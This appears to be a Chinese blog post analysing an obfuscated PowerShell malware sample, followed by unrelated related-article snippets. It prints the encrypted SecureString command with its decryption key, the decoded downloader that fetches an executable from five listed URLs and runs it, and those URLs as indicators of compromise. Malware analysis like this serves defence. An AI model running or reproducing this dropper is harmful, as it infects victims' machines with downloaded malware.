样本地址

https://www.hybrid-analysis.com/sample/4b4b8b13c264c8f7d7034060e0e4818a573bebc576a94d7b13b4c1741591687f?environmentId=100#

样本使用ConvertTo-SecureString加密字符串。

代码



 powershell "([RUNTiME.iNTeRopsErViCeS.mArShal]::PTRTOstRiNGuNi( [rUnTime.IntErOPSERvIceS.maRsHal]::sECUResTriNGTOgLOBAlAlLOCUNIcoDe($('76492d1116743f0423413b16050a5345MgB8AFgAMgBBAGoAdwB2ADUAdgBzAEMAYwBlADkASwBMAFAAaAB1AEsANwB4AEEAPQA9AHwAYQBkADAAMwA0AGUAOQBiAGMAZABjADUAOABhAGMAYgAzADgANQA4ADMAOQBiAGQAYQAyADEAMwA2ADIAZgA3ADgAMwBlADUAZAAzADkANwBlAGUAMABkADcAZQA1AGEAOQBhADYAMQBlADEAMABlAGIAZABmADkAMQBkADEAYwAwAGQAMgA3ADcANwAyADAAOQA4AGMAYwA3ADYANABmADUANQAxADQAYgA1AGUAYgA3AGIAZQAxADcANgA3ADgAYwA1ADIANwA5ADMAMgBiAGEAZQA2ADEANAA1AGYAYwAyAGUAZgBkAGEAZgAyADgAMABlAGUAZgAzADIANABkADQANgA3AGQAMgBkADcAZgBmADEAZABkAGIAYgA1AGUANwBkAGUANAA1ADEAOAA4ADMANQAxAGUAMQA5AGUANgBhAGUANwA0ADkAMQA4ADMAZgAwADIANwBiADEAZAAwADkANAAxAGEAYwA4AGEAOQBlADAANgA4AGEAYgA2AGMAMgA1AGYANQA5ADQAOQAzADgAYgA1AGIANgA3ADIANwA1ADUANgA4ADEAYgBlADMANgA3AGQAYgBmAGEAZQBlADYAZgAwAGUAMgA5ADcAZQBlADAAZQBmAGYAZQBlADMAYgAzAGUAOAA2ADgAMQBiAGIAMQBlAGMANwA5ADAAYwBjADMAMwAxADUANwA0AGEAYQBkADAAYgA4ADUANwBkADMANwA5ADYAYQBmADgAMgBlADgAZQA4ADUAYwAwAGYAZQBmADIAMQBkADEAZQAxADQAMQA0AGYAYgA3ADUAMQA2ADgAMAAyAGEANAAzAGQAYQBkAGIAMABkADgANAA1ADYANQA3ADQANwBhADAAZQA4ADgAOQBjADQANgAyADkAZQAyAGYAZQA4ADcAOAA0ADgANwA3ADkAMwA4ADcAZQA0ADEAZAAzAGQAZQA0ADcANgA1ADEANwBiAGYAMgAxADYAMQA1ADUAMQAzAGUAYgA4ADAAMgA1ADgAOAAzADgAZQBkAGQAZgBhADIAMAA2ADMANAAwADgAZAAxADIAMwA0AGIAOQBlAGIAZQAyADcAOQA1AGMAMwBiADQAMQBlAGQAMgBjADYAMwA0ADkAOQAyAGMAMwBlADcAYQBhAGUAYQA4AGIAZgAwADMANwAyADMAYQA2ADMAZgA1AGMANQBjADcAMQA1AGEANQA1ADMANgBiAGEAZQBmAGYAMwA5ADQAMwBmADMAZgBjADMAMwBlAGIAYgBjADMAYgA2ADUAYgA2ADIAYQA2AGIAMAA3ADIANQA1AGMAYwA0AGEANAA0AGYAMgAyAGYANwAxAGUAMQBiADEAYgBiADMAMgAxADQAMAAyADcAOAAxADEANQBhAGIANwBhADAAMABhADcAZgA0ADkANwAwADAAOABmAGYAMwA3ADkAMwBlADgAOQA3ADYAYQAxADIAOQAwADMANwAwAGUAOQA0AGIAYwBhAGQAMwA3AGEAOQA0AGEAYwA2ADYAOABkAGYAMABiADMAYgBiAGMAZQA4ADIAMwAxAGQAYwBhAGQAYgA4ADQAMABlADAAYwA3ADkAYgBjADcAYgBjADcAOQA5ADYAYQAzAGYAZgA3ADUAZABkAGEAYQA0ADUAZgA1ADAAOQA1AGUAOAA4ADYAMABjAGIANgA1AGQAYgAwAGMAZgBjADMAZABhADkAOAA1ADYANwBhADQAMwBhADIAYwBhADEAMwA5AGEAMAAzADAANAA3AGIAOQBmAGMAZAA2ADgANwBlAGMAMAAzADAAZAA4ADQAMwAwAGEAZQA5ADQANgBhADcANAAxAGYAMABmADYAOAAwADMAOABlAGUAYQA3ADUANABjADgAMwAwADgANAAzAGYAMQBiADAAOQA4AGQAZABlAGYAZgAwADYANAAyADAANwA4ADMAMgAzAGQAZQAyADMAZQAwADMAMABkAGEAYQA4AGIANQA5ADMAMAAzADkAOQA3ADgANAAwADIANABlADgANAA5ADYAYwA3ADcAMAAwADEAYwAwADYAYgA1AGIANQBiADcAYQA5ADUAOAAxADcAOQA5ADAANwAzADUANgBkADgAZAA3AGQAMwAyAGEAYQBlADYANQBmADgAMgA1ADEAMABjAGQAZgBlADcAYwBmAGEAZQAxAGYAZgBkAGEAZQAwADAAMgA2AGIAZgA0ADEAOAA4ADQAYQBlAGQAZQA5AGMAOQAwADcAMgBkADUAZgA2AGEAMQA3ADEAMQBiAGEAYgBjAGIAZgBhADgAYwAyADcANwBiADMAYQA5ADAAYgA5ADcANgA1ADAAZgA2ADMAMgAwAGQAYgAzAGMAYwA4ADIAZgA2AGQAMQBjADgAMwBmADQAYQAxADYAMgBkADEANgA0ADAAMQBmADIAZgBkADMAYQBlAGIAOQBmAGYAZAAwADQAMwA4AGYANwBhAGMAMgBiADIAZQA1AGMAZQA5AGUAMgBlADUAMQA4ADcAOAA3ADYAYgBiAGEAOAA0ADMAZgAxADcANwA3ADYANABjAGQAYwBlADAAMQAyADQAYwBhAGQANgBiAGIAYQAzADUANgA3ADYAZQBiAGIAYgBiAGUANQBlAGQAYwA2AGMANgBhAGIANgAwAGEANQA5ADUAMQBlADUAMQA0ADQAMQBjADcAZABmADEAMgA3ADEAYwBkADUAZgBkADYAZAA0ADMAOAA1ADUAZQA0AGQAYQA0ADQAZABlAGYANAA0ADMANgA1ADkAMgAwADUAYwBjADMAMgBkADUAYwA2ADcAYQA1ADQAZQA3AGIAZAAyAGEAOQA2ADcANwAwADkANABhAGUANQBkAGUANwAxAGIAZABiADEAYQA2AGMANwAzAGEAZQA5ADEANwA1AGYAYQA1ADYAOAA3AGIAMgBhAGIAZQAyADgAYwA1ADEAZAAzADMAMQBmADEAMQAxADcAOAA4AGYAZAA3ADAANgAyAGUAZgAwADEAYwBmAGQAMQBlADUAMgBjADcANgBkAGEAMgA0ADYAMwAzAGIAMwA5AGMAMQA0ADUAYgA1AGMAZgBiAGYAOAA1AGEANwBkADgAMAAxADAAMwAzAGUAMwAxADIAZgAxAGIANAA3AGIAYwBlADUAMgAwADYAMgA1AGIAYwBlAGMAMwAwAGUANABlADkAMAAyAGYAOAA3ADEANQAxADMAMABhADAAMAA5ADkAYgA1ADQAZQBlAGYANQBjADgAMQBjAGQAMgA2AGQANQA2ADkAZAAyAGEAZgAxADUAYgA5AGYAOABkADQANQBmADAAZQA0ADkAZQA3ADYAYQA2ADAAZAA2ADQAMAA3AGYANwBiADkAMwA2ADkAZgBiADkAYQAxADEAZgA0ADYANAAwAGEAYgBkAGIAYQBjADQAYQBiAGMAYQA4ADIAOAA2AGQAOQBlAGIANQA2AGMAMQA0ADYAZgBiAGQAZABjAGIAYwA2ADIAZAA4ADkAZQBmADYAZgA3AGMAYgAzADcAYgA0ADgANwA5AGIAMwA0AGUAMAAzADQAMgA5ADQAZgAyAGQAZQA3AGQAMQA1ADMAYgBkADIANAA1AGEANgA0AGEANwBlADEAZAAyAGMAZgBhADkAOQBlADUAMgA2ADAAMAA4AGEANgA4ADQAZgA3ADYAOQBlADUAMgBiADYANgA2AGQAYQAwADMANgBkAGMAZQBjAGMAMgBhAGQAMgAwAGQAYgBhAGUANAAwADcANAA4AGYAZAA4AGYANAA0ADkAYQBlADEANwBiAGYAMgBlADMAYgA2ADMAZgA1ADIAYwAxADkANQA5AGYAOQBjAGUAYgA0ADEANQA0AGIANQBhADUANQBjAGUAOQBlADMANABmADEAYwAyADEANQAxADQANQA4ADgAOAAyADkANAA3AGUANwBhADQAMgA5ADAANQBhAGIANQAwADIAZgAxAGYAZABlAGYAYgA4ADcAYwAyADMAYwA1AGUAYQA4AGIANABkAGMANwBlADIAMwA2AGMAMwBmAGQAYwAzAGEAZgA5AGQAYQAwADMAOQAxAGQAMQBiADgAZAA2ADYAZAA3AGMAMABiADAAMgA1ADYAOABiADYAZQAzADcAMAAzAGUAZAA5ADkAYQA3ADQAZgBjADMANABiAGMAMQA0ADcANABiADMAYgBjADQAMwAxAGYANwBiAGUANgA5ADEANwAxADAANAAwAGEAMgAwADEAOQA1AGMANABkADAAMAAwAGEAMQA3AGUANwBjADgANwAzADcAZAA1ADAAMgBjAGIAOQBjADEAZQBkADYAYgBmAGEAMgBlAGYANABiADIAMgA1ADMAMQBhADAAYQBkADcAMAAxADcAMgA1ADgAOQA1ADAAZAA0AGEANQAxAGYAMQAwADIAMAA3AGMAZgA1AGYAMgA1AGYAYQAxAGYAZgA3ADEAMQBjADEAMwAzADkAZQBhADEAYgA4ADUANgA1ADAAMAAzAGEAMQBiADEAYgA0ADUAYQAzAGIAMgA2ADEANwA4ADgAOQA4ADMANwA4ADUAMwA4AGYAMAAwADMAZABkAGEAZAA5ADcAZQBiADYANAAzADkAOQA2ADIAYQBmADYAOQBjAGIAZQA5AGYANQA1ADMAZAA5AGMANwBmAGMAZQBiAGIANQAwADAAMABlADYAOQBmADkANwA3ADQAZABjADgAMABjADcAZAA2ADcAZAA4ADEAYgA1AGIANgBkADYAYgBiADAAZgA1ADQAMgBmADEAMgA2AGMAYQBjADQAYwBlAGYANgA0AGUAMAA3AGEAMAAyAGEAOAA2ADYAMwA0ADkANQBmADkAYgBlAGEAYwBjADgAMgA5ADIAZgAxADYAZgA1ADYAOQBkAGQAMAA2AGMANwA4AGYANQA2AGQAMgAyADEAYgA3ADkAMgA1AGUAZQAyAGUANABkADEAMgBkAGUANgBlAGQANAA4AGIANQA1ADQANwA5ADQAZQBhAGIANAAxAGEANgBmADYAZgBmADgAYQAzADIAMwAzAGYAYQA5ADkANwA2ADIANwA5ADEAMwA0AGQAYwBmAGMAOQAyADIANABkADUAYwA1AGQANAAyAGEANwBlADAANAA5ADUANwA1ADMAZgAwAGYAZgBjAGMAOQA3ADcAMAA4AGIAMwA1ADQAMgA3AGMAZAA1ADQANAAzADAANwAwAGIAMgAwADQAYgA4AGYAMQA4ADAAZgAyAGYAZABkADEANwBhADAANwBjADYANwAxADAANgA='| cOnVertTO-SEcUrEStrinG -KE 196,148,187,123,187,195,213,254,9,250,232,193,112,146,83,172,255,41,240,23,34,95,215,17,226,111,128,53,126,193,106,149)) ))| .( $Env:cOMSpeC[4,24,25]-JOIn'')




PS C:\Windows\system32> ([RUNTiME.iNTeRopsErViCeS.mArShal]::PTRTOstRiNGuNi( [rUnTime.IntErOPSERvIceS.maRsHal]::sECUResTr

iNGTOgLOBAlAlLOCUNIcoDe($('76492d1116743f0423413b16050a5345MgB8AFgAMgBBAGoAdwB2ADUAdgBzAEMAYwBlADkASwBMAFAAaAB1AEsANwB4A

EEAPQA9AHwAYQBkADAAMwA0AGUAOQBiAGMAZABjADUAOABhAGMAYgAzADgANQA4ADMAOQBiAGQAYQAyADEAMwA2ADIAZgA3ADgAMwBlADUAZAAzADkANwBlA

GUAMABkADcAZQA1AGEAOQBhADYAMQBlADEAMABlAGIAZABmADkAMQBkADEAYwAwAGQAMgA3ADcANwAyADAAOQA4AGMAYwA3ADYANABmADUANQAxADQAYgA1A

GUAYgA3AGIAZQAxADcANgA3ADgAYwA1ADIANwA5ADMAMgBiAGEAZQA2ADEANAA1AGYAYwAyAGUAZgBkAGEAZgAyADgAMABlAGUAZgAzADIANABkADQANgA3A

GQAMgBkADcAZgBmADEAZABkAGIAYgA1AGUANwBkAGUANAA1ADEAOAA4ADMANQAxAGUAMQA5AGUANgBhAGUANwA0ADkAMQA4ADMAZgAwADIANwBiADEAZAAwA

DkANAAxAGEAYwA4AGEAOQBlADAANgA4AGEAYgA2AGMAMgA1AGYANQA5ADQAOQAzADgAYgA1AGIANgA3ADIANwA1ADUANgA4ADEAYgBlADMANgA3AGQAYgBmA

GEAZQBlADYAZgAwAGUAMgA5ADcAZQBlADAAZQBmAGYAZQBlADMAYgAzAGUAOAA2ADgAMQBiAGIAMQBlAGMANwA5ADAAYwBjADMAMwAxADUANwA0AGEAYQBkA

DAAYgA4ADUANwBkADMANwA5ADYAYQBmADgAMgBlADgAZQA4ADUAYwAwAGYAZQBmADIAMQBkADEAZQAxADQAMQA0AGYAYgA3ADUAMQA2ADgAMAAyAGEANAAzA

GQAYQBkAGIAMABkADgANAA1ADYANQA3ADQANwBhADAAZQA4ADgAOQBjADQANgAyADkAZQAyAGYAZQA4ADcAOAA0ADgANwA3ADkAMwA4ADcAZQA0ADEAZAAzA

GQAZQA0ADcANgA1ADEANwBiAGYAMgAxADYAMQA1ADUAMQAzAGUAYgA4ADAAMgA1ADgAOAAzADgAZQBkAGQAZgBhADIAMAA2ADMANAAwADgAZAAxADIAMwA0A

GIAOQBlAGIAZQAyADcAOQA1AGMAMwBiADQAMQBlAGQAMgBjADYAMwA0ADkAOQAyAGMAMwBlADcAYQBhAGUAYQA4AGIAZgAwADMANwAyADMAYQA2ADMAZgA1A

GMANQBjADcAMQA1AGEANQA1ADMANgBiAGEAZQBmAGYAMwA5ADQAMwBmADMAZgBjADMAMwBlAGIAYgBjADMAYgA2ADUAYgA2ADIAYQA2AGIAMAA3ADIANQA1A

GMAYwA0AGEANAA0AGYAMgAyAGYANwAxAGUAMQBiADEAYgBiADMAMgAxADQAMAAyADcAOAAxADEANQBhAGIANwBhADAAMABhADcAZgA0ADkANwAwADAAOABmA

GYAMwA3ADkAMwBlADgAOQA3ADYAYQAxADIAOQAwADMANwAwAGUAOQA0AGIAYwBhAGQAMwA3AGEAOQA0AGEAYwA2ADYAOABkAGYAMABiADMAYgBiAGMAZQA4A

DIAMwAxAGQAYwBhAGQAYgA4ADQAMABlADAAYwA3ADkAYgBjADcAYgBjADcAOQA5ADYAYQAzAGYAZgA3ADUAZABkAGEAYQA0ADUAZgA1ADAAOQA1AGUAOAA4A

DYAMABjAGIANgA1AGQAYgAwAGMAZgBjADMAZABhADkAOAA1ADYANwBhADQAMwBhADIAYwBhADEAMwA5AGEAMAAzADAANAA3AGIAOQBmAGMAZAA2ADgANwBlA

GMAMAAzADAAZAA4ADQAMwAwAGEAZQA5ADQANgBhADcANAAxAGYAMABmADYAOAAwADMAOABlAGUAYQA3ADUANABjADgAMwAwADgANAAzAGYAMQBiADAAOQA4A

GQAZABlAGYAZgAwADYANAAyADAANwA4ADMAMgAzAGQAZQAyADMAZQAwADMAMABkAGEAYQA4AGIANQA5ADMAMAAzADkAOQA3ADgANAAwADIANABlADgANAA5A

DYAYwA3ADcAMAAwADEAYwAwADYAYgA1AGIANQBiADcAYQA5ADUAOAAxADcAOQA5ADAANwAzADUANgBkADgAZAA3AGQAMwAyAGEAYQBlADYANQBmADgAMgA1A

DEAMABjAGQAZgBlADcAYwBmAGEAZQAxAGYAZgBkAGEAZQAwADAAMgA2AGIAZgA0ADEAOAA4ADQAYQBlAGQAZQA5AGMAOQAwADcAMgBkADUAZgA2AGEAMQA3A

DEAMQBiAGEAYgBjAGIAZgBhADgAYwAyADcANwBiADMAYQA5ADAAYgA5ADcANgA1ADAAZgA2ADMAMgAwAGQAYgAzAGMAYwA4ADIAZgA2AGQAMQBjADgAMwBmA

DQAYQAxADYAMgBkADEANgA0ADAAMQBmADIAZgBkADMAYQBlAGIAOQBmAGYAZAAwADQAMwA4AGYANwBhAGMAMgBiADIAZQA1AGMAZQA5AGUAMgBlADUAMQA4A

DcAOAA3ADYAYgBiAGEAOAA0ADMAZgAxADcANwA3ADYANABjAGQAYwBlADAAMQAyADQAYwBhAGQANgBiAGIAYQAzADUANgA3ADYAZQBiAGIAYgBiAGUANQBlA

GQAYwA2AGMANgBhAGIANgAwAGEANQA5ADUAMQBlADUAMQA0ADQAMQBjADcAZABmADEAMgA3ADEAYwBkADUAZgBkADYAZAA0ADMAOAA1ADUAZQA0AGQAYQA0A

DQAZABlAGYANAA0ADMANgA1ADkAMgAwADUAYwBjADMAMgBkADUAYwA2ADcAYQA1ADQAZQA3AGIAZAAyAGEAOQA2ADcANwAwADkANABhAGUANQBkAGUANwAxA

GIAZABiADEAYQA2AGMANwAzAGEAZQA5ADEANwA1AGYAYQA1ADYAOAA3AGIAMgBhAGIAZQAyADgAYwA1ADEAZAAzADMAMQBmADEAMQAxADcAOAA4AGYAZAA3A

DAANgAyAGUAZgAwADEAYwBmAGQAMQBlADUAMgBjADcANgBkAGEAMgA0ADYAMwAzAGIAMwA5AGMAMQA0ADUAYgA1AGMAZgBiAGYAOAA1AGEANwBkADgAMAAxA

DAAMwAzAGUAMwAxADIAZgAxAGIANAA3AGIAYwBlADUAMgAwADYAMgA1AGIAYwBlAGMAMwAwAGUANABlADkAMAAyAGYAOAA3ADEANQAxADMAMABhADAAMAA5A

DkAYgA1ADQAZQBlAGYANQBjADgAMQBjAGQAMgA2AGQANQA2ADkAZAAyAGEAZgAxADUAYgA5AGYAOABkADQANQBmADAAZQA0ADkAZQA3ADYAYQA2ADAAZAA2A

DQAMAA3AGYANwBiADkAMwA2ADkAZgBiADkAYQAxADEAZgA0ADYANAAwAGEAYgBkAGIAYQBjADQAYQBiAGMAYQA4ADIAOAA2AGQAOQBlAGIANQA2AGMAMQA0A

DYAZgBiAGQAZABjAGIAYwA2ADIAZAA4ADkAZQBmADYAZgA3AGMAYgAzADcAYgA0ADgANwA5AGIAMwA0AGUAMAAzADQAMgA5ADQAZgAyAGQAZQA3AGQAMQA1A

DMAYgBkADIANAA1AGEANgA0AGEANwBlADEAZAAyAGMAZgBhADkAOQBlADUAMgA2ADAAMAA4AGEANgA4ADQAZgA3ADYAOQBlADUAMgBiADYANgA2AGQAYQAwA

DMANgBkAGMAZQBjAGMAMgBhAGQAMgAwAGQAYgBhAGUANAAwADcANAA4AGYAZAA4AGYANAA0ADkAYQBlADEANwBiAGYAMgBlADMAYgA2ADMAZgA1ADIAYwAxA

DkANQA5AGYAOQBjAGUAYgA0ADEANQA0AGIANQBhADUANQBjAGUAOQBlADMANABmADEAYwAyADEANQAxADQANQA4ADgAOAAyADkANAA3AGUANwBhADQAMgA5A

DAANQBhAGIANQAwADIAZgAxAGYAZABlAGYAYgA4ADcAYwAyADMAYwA1AGUAYQA4AGIANABkAGMANwBlADIAMwA2AGMAMwBmAGQAYwAzAGEAZgA5AGQAYQAwA

DMAOQAxAGQAMQBiADgAZAA2ADYAZAA3AGMAMABiADAAMgA1ADYAOABiADYAZQAzADcAMAAzAGUAZAA5ADkAYQA3ADQAZgBjADMANABiAGMAMQA0ADcANABiA

DMAYgBjADQAMwAxAGYANwBiAGUANgA5ADEANwAxADAANAAwAGEAMgAwADEAOQA1AGMANABkADAAMAAwAGEAMQA3AGUANwBjADgANwAzADcAZAA1ADAAMgBjA

GIAOQBjADEAZQBkADYAYgBmAGEAMgBlAGYANABiADIAMgA1ADMAMQBhADAAYQBkADcAMAAxADcAMgA1ADgAOQA1ADAAZAA0AGEANQAxAGYAMQAwADIAMAA3A

GMAZgA1AGYAMgA1AGYAYQAxAGYAZgA3ADEAMQBjADEAMwAzADkAZQBhADEAYgA4ADUANgA1ADAAMAAzAGEAMQBiADEAYgA0ADUAYQAzAGIAMgA2ADEANwA4A

DgAOQA4ADMANwA4ADUAMwA4AGYAMAAwADMAZABkAGEAZAA5ADcAZQBiADYANAAzADkAOQA2ADIAYQBmADYAOQBjAGIAZQA5AGYANQA1ADMAZAA5AGMANwBmA

GMAZQBiAGIANQAwADAAMABlADYAOQBmADkANwA3ADQAZABjADgAMABjADcAZAA2ADcAZAA4ADEAYgA1AGIANgBkADYAYgBiADAAZgA1ADQAMgBmADEAMgA2A

GMAYQBjADQAYwBlAGYANgA0AGUAMAA3AGEAMAAyAGEAOAA2ADYAMwA0ADkANQBmADkAYgBlAGEAYwBjADgAMgA5ADIAZgAxADYAZgA1ADYAOQBkAGQAMAA2A

GMANwA4AGYANQA2AGQAMgAyADEAYgA3ADkAMgA1AGUAZQAyAGUANABkADEAMgBkAGUANgBlAGQANAA4AGIANQA1ADQANwA5ADQAZQBhAGIANAAxAGEANgBmA

DYAZgBmADgAYQAzADIAMwAzAGYAYQA5ADkANwA2ADIANwA5ADEAMwA0AGQAYwBmAGMAOQAyADIANABkADUAYwA1AGQANAAyAGEANwBlADAANAA5ADUANwA1A

DMAZgAwAGYAZgBjAGMAOQA3ADcAMAA4AGIAMwA1ADQAMgA3AGMAZAA1ADQANAAzADAANwAwAGIAMgAwADQAYgA4AGYAMQA4ADAAZgAyAGYAZABkADEANwBhA

DAANwBjADYANwAxADAANgA='| cOnVertTO-SEcUrEStrinG -KE 196,148,187,123,187,195,213,254,9,250,232,193,112,146,83,172,255,41

,240,23,34,95,215,17,226,111,128,53,126,193,106,149)) ))

$nsadasd = &('n'+'e'+'w-objec'+'t') random;$YYU = .('ne'+'w'+'-object') System.Net.WebClient;$NSB = $nsadasd.next(10000

, 282133);$ADCX = '

http://quote.freakget.com/wp-content/rCk5/@http://www.lightchasers.in/Mwmg/@http://casastoneworks.com.au/9ARR4/@http://

jasclair.com/scI8YTL/@http://convivialevent.fr/IoVWm/'.Split('@');$SDC = $env:public + '\' + $NSB + ('.ex'+'e');foreach

($asfc in $ADCX){try{$YYU."Do`Wnl`OadFI`le"($asfc."ToStr`i`Ng"(), $SDC);&('Invo'+'k'+'e-Item')($SDC);break;}catch{}}

PS C:\Windows\system32>

Network IoCs:

http://quote.freakget.com/wp-content/rCk5/

http://www.lightchasers.in/Mwmg/

http://casastoneworks.com.au/9ARR4/@http://

http://jasclair.com/scI8YTL/

http://convivialevent.fr/IoVWm/

记一次powershell反混淆(2)的更多相关文章

  1. 记一次Powershell反混淆 (1)

    样本地址: https://www.virustotal.com/#/file/6f9034646e6fcead5342f708031412e3c2efdb4fb0f37bba43133a471d1c ...

  2. .net破解一(反编译,反混淆-剥壳)

    大家好,前段时间做数据分析,需要解析对方数据,而数据文件是对方公司内部的生成方式,完全不知道它是怎么生成的. 不过还好能拿到客户端(正好是C#开发)所以第一件事就是用Reflector编译,但是没有想 ...

  3. C# 反编译-Reflector 反混淆-De4Dot 修改dll/exe代码-reflexil

    反编译工具 Reflector 破解版下载地址:http://pan.baidu.com/s/15UwJo 使用方法:略 反混淆工具De4Dot 开源软件 下载地址http://pan.baidu.c ...

  4. js混淆 反混淆 在线

    js反混淆地址:http://www.bm8.com.cn/jsConfusion/ 在线javascript 混淆http://www.moralsoft.com/jso-online/hdojso ...

  5. net破解一(反编译,反混淆-剥壳,工具推荐)

    net破解一(反编译,反混淆-剥壳,工具推荐) 大家好,前段时间做数据分析,需要解析对方数据,而数据文件是对方公司内部的生成方式,完全不知道它是怎么生成的. 不过还好能拿到客户端(正好是C#开发)所以 ...

  6. RESTClient调试POST方法&Reflector+de4dot反混淆破解dll

    RESTClient调试POST方法 RESTClient是火狐的一款WebAPI测试工具. 1.先看下我们要调试的接口

  7. .net反混淆脱壳工具de4dot的使用

    de4dot是一个开源的.net反混淆脱壳工具,是用C#编写的,介绍一下它的使用方法 首先 pushd 到de4dot.exe所在文件夹,然后调用 de4dot.exe  路径+dll名称 如果显示: ...

  8. 通过C#调用,实现js加密代码的反混淆,并运行js函数

    前一篇我测试了vba调用htmlfile做反混淆,并执行js加密函数的代码.本文换成C#实现. 联系QQ:564955427 C#操作JS函数,可以通过ScriptControl组件,但这个组件只能在 ...

  9. 使用VBA进行JS加密的反混淆,还原JS代码。

    本文地址:http://www.cnblogs.com/Charltsing/p/JSEval.html 联系QQ:564955427 类似下面的代码是登陆 全国企业信用信息公示系统(安徽)(网址:h ...

随机推荐

  1. Mysql中的索引

    索引 什么是索引? 索引是系统内部自动维护的隐藏的“数据表”,它的作用是,可以极大地加快数据的查找速度! 这个隐藏的数据表,其中的数据是自动排好序的,其查找速度就是建立在这个基础上. 通常,所谓建立索 ...

  2. 第194天:js---函数对象详解(arguments、length)

    一.函数即对象 function add1(a,b){ return a+b; } //Function对象的实例 -- 高级技巧 --- 写框架必须用的... //前面表示参数,后面表示函数语句 v ...

  3. 【uoj#207】共价大爷游长沙 随机化+LCT维护子树信息

    题目描述 给出一棵树和一个点对集合S,多次改变这棵树的形态.在集合中加入或删除点对,或询问集合内的每组点对之间的路径是否都经过某条给定边. 输入 输入的第一行包含一个整数 id,表示测试数据编号,如第 ...

  4. 【数据库_Postgresql】实体类映射问题之不执行sql语句

    后台controller到dao都没问题,前台页面接收的是一个实体类对象,在service层接收的也是对象,传入mapper里面的也是对象,没有用map,但是打印台却不执行sql语句,也没有明显错误提 ...

  5. 英文报道:China challenged Australian warships in South China Sea, reports say

    学习地道新闻英语表达,以下文章来自CNN By Ben Westcott and Jamie Tarabay, CNN Updated 0830 GMT (1630 HKT) April 20, 20 ...

  6. 洛谷 3201 [HNOI2009]梦幻布丁 解题报告

    3201 [HNOI2009]梦幻布丁 题目描述 \(N\)个布丁摆成一行,进行\(M\)次操作.每次将某个颜色的布丁全部变成另一种颜色的,然后再询问当前一共有多少段颜色.例如颜色分别为\(1,2,2 ...

  7. 20165218 2017-2018-2 《Java程序设计》课程总结

    20165218 2017-2018-2 <Java程序设计>课程总结 一.每周作业链接汇总 20165218 我期望的师生关系 20165218 学习基础和C语言基础调查 2016521 ...

  8. Codeforces 585E. Present for Vitalik the Philatelist(容斥)

    好题!学习了好多 写法①: 先求出gcd不为1的集合的数量,显然我们可以从大到小枚举计算每种gcd的方案(其实也是容斥),或者可以直接枚举gcd然后容斥(比如最大值是6就用2^cnt[2]-1+3^c ...

  9. 图像处理之中值滤波介绍及C实现

    1 中值滤波概述 中值滤波是基于排序统计理论的一种能有效抑制噪声的非线性信号平滑处理技术,它将每一像素点的灰度值设置为该点某邻域窗口内的所有像素点灰度值的中值. 中值滤波的基本原理是把数字图像或数字序 ...

  10. 线性判别分析(Linear Discriminant Analysis)

    1. 问题 之前我们讨论的PCA.ICA也好,对样本数据来言,可以是没有类别标签y的.回想我们做回归时,如果特征太多,那么会产生不相关特征引入.过度拟合等问题.我们可以使用PCA来降维,但PCA没有将 ...